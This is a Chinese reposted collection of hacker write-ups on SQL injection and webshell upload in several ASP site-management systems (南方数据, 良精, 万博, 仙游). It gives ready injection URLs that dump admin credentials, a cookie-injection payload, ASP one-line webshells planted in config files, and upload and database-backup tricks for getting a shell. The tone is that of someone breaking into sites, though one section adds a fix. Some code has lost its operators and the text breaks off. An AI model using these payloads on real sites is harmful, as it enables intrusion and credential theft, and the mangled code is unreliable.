首页 > 范文大全

南方数据网站管理系统注入漏洞&后台拿WebShell漏洞预警

时间：2025年01月25日

来源：默一虹

编辑：本站小编

收藏本文

下载本文

以下是小编收集整理的南方数据网站管理系统注入漏洞&后台拿WebShell漏洞预警，本文共5篇，欢迎阅读与借鉴。本文原稿由网友“默一虹”提供。

篇1：南方数据网站管理系统注入漏洞&后台拿WebShell漏洞预警

/Databases/0791idc.mdb

1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7

也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7

直接暴管理员帐号密码(md5)

2.登陆后台

3.利用编辑器上传:

访问admin/southidceditor/admin_style.asp

修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.

========================================

参考资料整理:

南方数据、良精系统、网软天下漏洞利用

1、通过upfile_other.asp漏洞文件直接取SHELL

直接打开userreg.asp进行注册会员，进行登录，（在未退出登录的状态下）使用本地上传文件进行上传代码如下：

encType=multipart/form-data>

将以上代码保存为html格式，替换代码中的网址，第一个框里选择图片文件，第二个框选择.cer、.asa或asp文件上传（后面需要加一个空格，貌似在IE8中进行使用不能后面加空格，加空格时就弹出选择文件对话框，我是找不到解决办法），

注：此方法通杀南方数据、良精系统、网软天下等

2、通过注入秒杀管理员帐号密码，使用如下：

www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’

以上代码直接暴管理员帐号和密码，取SHELL方法如下：

在网站配置[www.target.com/admin/SiteConfig.asp]的版权信息里写入 “%><%eval(request(chr(35)))%><%’

成功把shell写入www.target.com/inc/config.asp

这里一句话chr(32)密码是“#”

3、cookie注入

清空地址栏，利用union语句来注入，提交：

javascript.:alert(document.cookie=”id=“+escape(”1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin“))

如果你牛你就手工，反正我是不会，用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为？

注：貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入，

（当然南方不只有上面三个漏洞，还有几个漏洞貌似不常用，反正我给我常用的总结出来希望对大家有帮助）

三、后台取SHELL方法总结

（1）在系统管理中的网站配置中插入一句话马：进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入”%><%Eval(Request(chr(112)))%><%’，再点保存配置，如图：

然后我们打开inc/config.asp文件，看到一句话马已写入到配置文件中了，

这时再打开一句话马的客户端,提交同样得到一个小马

(注:以下均在其它网站上测试所截的图，为防止信息泄漏，未截留网站连接，请谅解！)

（2）后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下：

if fileEXT=“asp” or fileEXT=“asa” or fileEXT=“aspx” then

EnableUpload=false

end if

if EnableUpload=false then

msg=“这种文件类型不允许上传！nn只允许上传这几种文件类型：” & UpFileType

FoundErr=true

end if

大家可以看到程序只限制了对“asp”，“asa”,“aspx”类的文件上传，我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可，如图：

提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)

（3）后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的

点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的

直接访问备份后的地址,就得到一个webshell

（以上虽用网软做的后台演示，但南方和良精后台取shell都是大同小异的）

篇2：万博企业网站管理系统注入漏洞(MemberLogin.asp)

这个注入漏洞发生在html/MemberLogin.asp文件里，在Include下有NoSqlHack.Asp文件也没调用，呵呵，就有了我们利用的地方了

这两天拿站的时候，好几回都遇到个叫万博的企业管理系统，今天有时间就下载过来看了看，找到了个注入漏洞，郁闷的是，得手工，没法用工具，累人的事，

万博企业网站管理系统注入漏洞(MemberLogin.asp)

。因为已经找到了一个，我就没兴趣接着往下看了。

这个注入漏洞发生在html/MemberLogin.asp文件里，在Include下有NoSqlHack.Asp文件也没调用，呵呵，就有了我们利用的地方了。

MemberLogin.asp源码如下：

复制代码

代码如下:

<%@LANGUAGE=“VBSCRIPT” CODEPAGE=“65001”%>

<% Option Explicit %>

<%Response.Charset=“utf-8”%>

if request.QueryString(“Action”)=“Out” then

session.contents.remove “MemName”

session.contents.remove “GroupID”

session.contents.remove “GroupLevel”

session.contents.remove “MemLogin”

response.redirect Cstr(request.ServerVariables(“HTTP_REFERER”))

response.end

end if

Public ErrMsg(3)

ErrMsg(0)=“·登录名不正确，请返回。”

ErrMsg(1)=“·登录密码不正确，请返回。”

ErrMsg(2)=“·帐号非使用状态，请返回。”

dim LoginName,LoginPassword,VerifyCode,MemName,Password,GroupID,GroupName,Working,rs,sql

LoginName=trim(request.form(“LoginName”))

LoginPassword=Md5(request.form(“LoginPassword”))

set rs = server.createobject(“adodb.recordset”)

sql=“select * from NwebCn_Members where MemName='”&LoginName&“'”

rs.open sql,conn,1,3

if rs.bof and rs.eof then

WriteMsg(ErrMsg(0))

response.end

else

MemName=rs(“MemName”)

Password=rs(“Password”)

GroupID=rs(“GroupID”)

GroupName=rs(“GroupName”)

Working=rs(“Working”)

end if

if LoginPasswordPassword then

WriteMsg(ErrMsg(1))

response.end

end if

if not Working then

WriteMsg(ErrMsg(2))

response.end

end if

if UCase(LoginName)=UCase(MemName) and LoginPassword=Password then

rs(“LastLoginTime”)=now

rs(“LastLoginIP”)=Request.ServerVariables(“Remote_Addr”)

rs(“LoginTimes”)=rs(“LoginTimes”)+1

rs.update

rs.close

set rs=nothing

session(“MemName”)=MemName

session(“GroupID”)=GroupID

'===========

set rs = server.createobject(“adodb.recordset”)

sql=“select * from NwebCn_MemGroup where GroupID='”&GroupID&“'”

rs.open sql,conn,1,1

session(“GroupLevel”)=rs(“GroupLevel”)

rs.close

set rs=nothing

'===========

session(“MemLogin”)=“Succeed”

session.timeout=60

response.redirect Cstr(request.ServerVariables(“HTTP_REFERER”))

response.end

end if

看到了，LoginName未作过滤，直接代入查询，因此产生了这个注入，就是利用的方法有点麻烦，我试了下，没办法用工具，郁闷了，

手工如：wzasdf' and exists (select * from [nwebcn_admin]) and '1'='1

修复方法：LoginName=trim(request.form(“LoginName”))

用LoginName=server.htmlencode(trim(request.form(“LoginName”)) )

或加入include目录里面的NoSqlHack.Asp记载一下也可以。

FROM www.st999.cn/blog

篇3：仙游旅行社网站管理系统 v1.5 注入漏洞漏洞预警

<“ CODEPAGE=”936“%><%

dim idd

idd=trim(request(”id“)) ‘’‘’‘’‘’‘’‘’‘’‘’ 无过滤

if idd=”“ then

call errbox(”无效的参数传递“,”“,”“,”“,”“)

end if

set rs=server.CreateObject(”adodb.recordset“)

rs.open ”select * from lxscms_i where shenhe=1 and id=“&idd,conn,1,3

if rs.eof and rs.bof then

call errbox(”您所查找的信息不存在“,”“,”“,”“,”“)

else

if rs(”hits“)=0 or rs(”hits“)=”“ then

rs(”hits“)=1

else

rs(”hits“)=rs(”hits“)+1

end if

if rs(”uurl“) ”“ then

response.Redirect ”“& rs(”uurl“) &”“

end if

sub_top_foot.asp

sub errbox(boxvalue,boxurl,box1,box2,box3)

if boxvalue = ”“ then

boxvalues = ”“

else

boxvalues = boxvalue

end if

if box1 = ”1“ then

boxurls = boxurl

else

if boxurl = ”“ then

boxurls = ”history.go(-1);“

else

boxurls = ”window.location.href = '“& boxurl &”';“

end if

if box1 = ”1“ then

response.write ”“& boxvalues &”

后退至上一页继续操作下一步“

response.end

else

response.write ”“

response.end

end if

end sub

Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_Z'

On Error Resume Next

Fy_Url=LCase(Request.ServerVariables(”QUERY_STRING“))

Fy_a=split(Fy_Url,”&“)

redim Fy_Cs(ubound(Fy_a))

On Error Resume Next

for Fy_x=0 to ubound(Fy_a)

Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),”=“)-1)

For Fy_x=0 to ubound(Fy_Cs) Fy_cs(0) =id

If Fy_Cs(Fy_x)”“ Then

If Instr(LCase(Request(Fy_Cs(Fy_x))),”'“)0 or Instr(LCase(Request(Fy_Cs(Fy_x))),”and“)0 or Instr(LCase(Request(Fy_Cs(Fy_x))),”select“)0 or Instr(LCase(Request(Fy_Cs(Fy_x))),”update“)0 or Instr(LCase(Request(Fy_Cs(Fy_x))),”chr“)0 or Instr(LCase(Request(Fy_Cs(Fy_x))),”delete%20from“)0 or Instr(LCase(Request(Fy_Cs(Fy_x))),”;“)0 or Instr(LCase(Request(Fy_Cs(Fy_x))),”insert“)0 or Instr(LCase(Request(Fy_Cs(Fy_x))),”mid“)0 Or Instr(LCase(Request(Fy_Cs(Fy_x))),”master.“)0 Then

Select Case Fy_Cl

Case ”1“

call errbox(”因为你的某些非法操作,系统已经锁定了你的IP“,”“,”“,”“)

Case ”2“

call errbox(”因为你的某些非法操作,系统已经锁定了你的IP“,”“,”“,”“)

Case ”3“

call errbox(”因为你的某些非法操作,系统已经锁定了你的IP“,”“,”“,”“)

End Select

Response.End

问题出在这：Fy_Url=LCase(Request.ServerVariables(”QUERY_STRING“))

这个提交的数据不会解码

程序根据name来判断 value If Instr(LCase(Request(Fy_Cs(Fy_x))),”'\")0